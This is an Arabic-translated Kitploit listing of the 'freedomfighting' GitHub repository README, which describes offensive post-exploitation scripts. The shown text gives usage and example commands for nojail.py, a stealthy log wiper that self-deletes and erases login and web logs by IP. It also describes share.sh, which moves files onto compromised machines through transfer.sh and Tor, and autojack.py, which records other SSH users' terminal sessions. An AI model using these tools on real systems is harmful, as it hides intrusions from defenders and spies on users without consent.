Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
freedomfighting — مجموعة من البرامج النصية التي قد تكون مفيدة أثناء أنشطتك في النضال من أجل الحرية. | Kitploit
أدوات/GitHubGitHub/justicerage/freedomfighting
الاستطلاعأدوات التشفير/فك التشفيرالتحقيق الجنائي الرقميجمع المعلوماتما بعد الاستغلالأمن الويباختبار الاختراقالفريق الأحمرزاحف الويبأداة الوصول عن بعدتحليل السجلات
4186815منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
justicerage/freedomfighting

freedomfighting

مجموعة من البرامج النصية التي قد تكون مفيدة أثناء أنشطتك في النضال من أجل الحرية.

عرض المستودع

نصوص النضال من أجل الحرية

يحتوي هذا المستودع على نصوص قد تكون مفيدة أثناء أنشطتك في النضال من أجل الحرية. سيتم تحديثه من حين لآخر، عندما أجد نفسي بحاجة إلى شيء لا يمكنني العثور عليه عبر الإنترنت. كل شيء هنا يتم توزيعه بموجب شروط رخصة GPL v3.

المساهمات وطلبات السحب (Pull Requests) مرحب بها للغاية.

جدول المحتويات

  • nojail.py، أداة تنظيف سجلات بايثون.
  • share.sh، نص لمشاركة الملفات بشكل آمن.
  • autojack.py، مسجل مصطلحات.
  • listurl.py، مخطط مواقع.
  • ersh.py، قوقعة عكسية مشفرة.
  • boot_check.py، نص للكشف عن هجمات الخادمة الشريرة (evil-maid).
  • notify_hook.py، طريقة لتشغيل التنبيهات عند استدعاء بعض الملفات الثنائية على النظام.
  • متنوع (جهات الاتصال والتبرعات)

nojail.py

أداة تنظيف سجلات تزيل الإدخالات المسيئة من:

  • /var/run/utmp، /var/log/wtmp، /var/log/btmp (تتحكم في مخرجات أوامر who، w و last)
  • /var/log/lastlog (يتحكم في مخرجات الأمر lastlog)
  • /var/**/*.log (.log.1، .log.2.gz، إلخ. متضمنة)
  • أي ملف أو مجلد إضافي يحدده المستخدم

يتم حذف الإدخالات بناءً على عنوان IP و/أو اسم المضيف المرتبط.

يتم اتخاذ عناية خاصة لتجنب كسر واصفات الملفات أثناء العبث بالسجلات. هذا يعني أن السجلات تستمر في الكتابة إليها بعد التلاعب بها، مما يجعل عملية التنظيف أقل وضوحًا بكثير. كل العمل يتم في محرك tmpfs ويتم مسح أي ملفات يتم إنشاؤها بأمان.

تحذير: تم اختبار النص فقط على لينكس ولن يكون قادرًا على تنظيف إدخالات UTMP على أنظمة يونكس الأخرى.

Usage:```

usage: nojail.py [-h] [--user USER] [--ip IP] [--hostname HOSTNAME] [--verbose] [--check] [log_files [log_files ...]]

Stealthy log file cleaner.

positional arguments: log_files Specify any log files to clean in addition to /var/**/*.log.

optional arguments: -h, --help show this help message and exit --user USER, -u USER The username to remove from the connexion logs. --ip IP, -i IP The IP address to remove from the logs. --hostname HOSTNAME The hostname of the user to wipe. Defaults to the rDNS of the IP. --regexp REGEXP, -r REGEXP A regular expression to select log lines to delete (optional)

 --verbose, -v         Print debug messages.
 --check, -c           If present, the user will be asked to confirm each
                       deletion from the logs.
 --daemonize, -d       Start in the background and delete logs when the
                       current session terminates. Implies --self-delete.
 --self-delete, -s     Automatically delete the script after its execution.
بشكل افتراضي، إذا لم تُعطَ أي وسائط، سيحاول البرنامج النصي تحديد عنوان IP المراد تنظيفه استناداً إلى
`SSH_CONNECTION` متغير البيئة. كما ستتم إزالة أي إدخال يطابق DNS العكسي لذلك عنوان IP.

#### مثال أساسي:```
./nojail.py --user root --ip 151.80.119.32 /etc/app/logs/access.log --check

...سيؤدي إلى إزالة جميع الإدخالات للمستخدم root حيث يكون عنوان IP هو 151.80.119.32 أو اسم المضيف هو manalyzer.org. سيُطلب من المستخدم أيضًا التأكيد قبل حذف كل سجل بسبب خيار --check. أخيرًا، سيتم معالجة الملف /etc/app/logs/access.log بالإضافة إلى جميع الملفات الافتراضية.

إذا تم إعطاء مجلدات كوسائط موضعية (مثل /etc/app/logs/)، فسيقوم البرنامج النصي بالزحف إليها بشكل متكرر وتنظيف أي ملف بامتداد .log (بما في ذلك *.log.1, *.log.2.gz، إلخ).

التعبيرات النمطية

قد ترغب أيضًا في إزالة أسطر عشوائية من ملف السجل. للقيام بذلك، استخدم خيار --regexp. على سبيل المثال، سيبحث سطر الأوامر التالي عن جميع طلبات POST إلى ملفات PHP من عنوان IP المحدد:``` ./nojail.py --ip 151.80.119.32 --regexp "POST /.*?.php"

#### تحويل السكربت إلى خفي```
./nojail.py --daemonize

بافتراض أن هذا الأمر يُنفَّذ من اتصال SSH، فإنه سيحذف جميع السجلات المتعلقة بنشاط المستخدم الحالي مع عنوان IP واسم المضيف المُكتشَفين فور إغلاق الاتصال. سيقوم هذا البرنامج النصي لاحقًا بحذف نفسه تلقائيًا. يرجى مراعاة أنه لن تتاح لك أي فرصة لتلقي رسائل الخطأ من التطبيق. يُنصح بتجربة حذف السجلات مرة واحدة قبل إنشاء الخفي (daemon) للتأكد من صحة الوسائط التي حددتها. إذا كنت في شِل (shell) بدون TTY، فلن يتمكن البرنامج النصي من اكتشاف موعد انتهاء الجلسة. سيتم إعلامك بأن السجلات سيتم حذفها بعد 60 ثانية، وأنه يجب عليك تسجيل الخروج قبل ذلك (أو المخاطرة بإنشاء المزيد من الإدخالات بعد تشغيل البرنامج النصي).

مثال على الإخراج:```

root@proxy:~# ./nojail.py [ ] Cleaning logs for root (XXX.XXX.XXX.XXX - domain.com). [] 2 entries removed from /var/run/utmp! [] 4 entries removed from /var/log/wtmp! [ ] No entries to remove from /var/log/btmp. [] Lastlog set to 2017-01-09 17:12:49 from pts/0 at lns-bzn-XXX-XXX-XXX-XXX-XXX.adsl.proxad.net [] 4 lines removed from /var/log/nginx/error.log! [] 11 lines removed from /var/log/nginx/access.log! [] 4 lines removed from /var/log/auth.log!

### إخلاء مسؤولية
هذا السكريبت مقدّم دون أي ضمانات.
لا تلومني إذا لم يمحِ كل آثار شيءٍ لم يكن ينبغي لك فعله من الأساس.

## share.sh

سكريبت مشاركة ملفات محمول وآمن. أثناء الكفاح من أجل الحرية، عادةً لا يكون من الممكن نسخ الملفات عبر scp إلى
الأجهزة المخترقة. هناك حاجة إلى طرق بديلة لرفع الملفات، لكن معظم خدمات المشاركة إما مقيدة جدًا
أو لا توفر طريقة لاسترجاع الملفات بسهولة من سطر الأوامر. قد تمنع الاعتبارات الأمنية أيضًا
الأشخاص من رفع ملفات حساسة إلى مزودي الخدمات السحابية خوفًا من احتفاظهم بنسخة منها إلى الأبد.

يعتمد هذا السكريبت الصغير المحمول بلغة bash على [transfer.sh](https://transfer.sh) لحل هذه المشكلة. إنه...
* يقوم بتشفير الملفات قبل رفعها (تشفير متماثل AES-256-CBC).
* يستخدم تلقائياً `torify` إذا كان موجودًا على النظام لزيادة إخفاء الهوية.

الاعتماديات الوحيدة المطلوبة هي `openssl` وإما `curl` أو `wget`.

### الاستخدام```
root@proxy:~# ./share.sh ~/file_to_share "My_Secure_Encryption_Key!"
Success! Retrieval command: ./share.sh -r file_to_share "My_Secure_Encryption_Key!" https://transfer.sh/BQPFz/28239
root@proxy:~# ./share.sh -r file_to_share "My_Secure_Encryption_Key!" https://transfer.sh/BQPFz/28239
File retrieved successfully!

الوسائط الإضافية أثناء الرفع تسمح لك بالتحكم في الحد الأقصى لعدد التنزيلات المسموح بها للملف (-m) وعدد الأيام التي سيحتفظ بها transfer.sh بالملف (-d). القيمة الافتراضية لكلا الخيارين هي 1.

تحذير: لا تستخدم مسافات في مفتاح التشفير، وإلا سيتم أخذ الكلمة الأولى فقط من عبارة المرور في الاعتبار. هذا بسبب طريقة معالجة getopts للوسائط (على ما أعتقد). طلبات السحب مرحب بها إذا كان أي شخص مهتمًا بإصلاح هذا.

autojack.py

AutoJack هو سكربت قصير يستخدم shelljack الخاص بـ EmptyMonkey لتسجيل طرفية أي مستخدم يتصل عبر SSH. يراقب auth.log للاتصالات الناجحة، ويجد PID لعملية bash الخاصة بالمستخدم، ويترك الباقي لـshelljack.

Launch it in a screen, and wait until other users log-in. Their session will be logged to /root/.local/sj.log.[user].[timestamp].

The script is not particularly stealthy (no attempt is made to hide the shelljack process) but it will get the job done. Note that to avoid self-incrimination, the root user is not targeted (this can be trivially commented out in the code).

listurl.py

ListURL is a multi-threaded website crawler which obtains a list of available pages from the target. This script is useful for bug-bounty hunters trying to establish the attack surface of a web application.

الاستخدام: listurl.py [-h] [--max-depth MAX_DEPTH] [--threads THREADS] [--url URL]  
                  [--external] [--subdomains] [-c COOKIE]  
                  [--exclude-regexp EXCLUDE_REGEXP]  
                  [--show-regexp SHOW_REGEXP] [--verbose]  

قم بتعيين موقع ويب عن طريق الحصول على جميع عناوين URL الخاصة به بشكل متكرر.
تنزيل الأداة